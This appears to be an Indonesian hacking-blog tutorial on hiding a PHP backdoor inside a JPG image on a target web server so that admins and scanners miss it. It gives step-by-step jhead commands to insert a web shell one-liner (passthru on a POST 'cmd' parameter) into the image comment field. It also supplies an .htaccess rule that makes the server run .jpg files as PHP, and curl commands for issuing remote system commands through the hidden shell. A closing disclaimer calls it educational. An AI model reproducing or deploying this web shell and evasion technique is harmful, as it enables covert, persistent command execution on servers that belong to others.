Menyisipkan File Backdoor PHP ke File Gambar JPG

Menyisipkan File Backdoor PHP ke File Gambar JPG - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Menyisipkan File Backdoor PHP ke File Gambar JPG, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Ada banyak cara yang bisa dilakukan untuk membuat file backdoor atau akses pintu belakang yang kita buat di server target tetap awet alias tidak ketauan dan diterminate oleh admin webnya. Mulai dari menyisipkan file hidden uploader ke file yang sudah ada dll. Namun tentu saja trik tersebut masih ada kekurangan karena file tetap akan dianggap virus ketika server di scan.

Nah kali ini kita akan membahas cara menyisipkan file backdoor php ke file gambar. Dan tentu saja ini bisa kita lakukan dengan cara mendownload file yang ada di server, modifikasi data, upload kemabali. Dengan ini kemungkinan backdoor kita ditemukan mengecil ( kecuali webmasternya pro ) .

Nah seperti yang terlihat diatas, file tersebut saat diakses langsung akan terlihat seperti gambar normal pada umumnya, namun tentu file tersebut lebih istimewa bagi attacker yang menyisipkan backdoor ke file tersebut 😀 .

Untuk menyisipkan file backdoor ke file gambar seperti itu, kita bisa menggunakan Jhead. Gunakan Linux :p

install dengan command :

sudo apt-get install jhead

Selanjutnya kita siapkan file gambar yang akan kita sisipi backdoor.

Untuk tutorial kali ini saya menggunakan file gambar asuna.jpg yang saya simpan di /Desktop/bd/

Pertama, kita murnikan file gambar tadi dengan command

jhead -purejpg asuna.jpg

Ini untuk menghapus comment ataupun script yang mungkin disisipkan sebelumnya.

Lalu masukkan command :

jhead -ce asuna.jpg

Selanjutnya kita masukkan script berikut ke dalam gambar :

<?php passthru($_POST['cmd']); __halt_compiler();

basic vim diperlukan karena yang digunakan adalah vim editor :p

Setelah disave, harusnya script tadi sudah nyempil di comment.

Lalu kita upload gambar yang disipi backdoor tadi ke server target.

Jangan lupa di direktori yang sama tambahkan .htaccess dengan isi :

AddType application/x-httpd-php .jpg

Ini ditujukan agar sript php didalamnya tetap terbaca meski ekstensi file nya bukan php.

Nah, cara mengakses backdoor nya :

curl -d cmd=command disini webtarget/gambar.jpg

Contoh :

curl -d cmd=uname -a; whoami; id http://localhost/gambar/asuna.jpg

menarik bukan ?

Oke sekian tutorial kali ini, selamat berpuasa.

Sumber http://noob1t4.blogspot.com/

Sekian Artikel Menyisipkan File Backdoor PHP ke File Gambar JPG.

Terima kasih telah membaca artikel Menyisipkan File Backdoor PHP ke File Gambar JPG, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.

Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

Share this post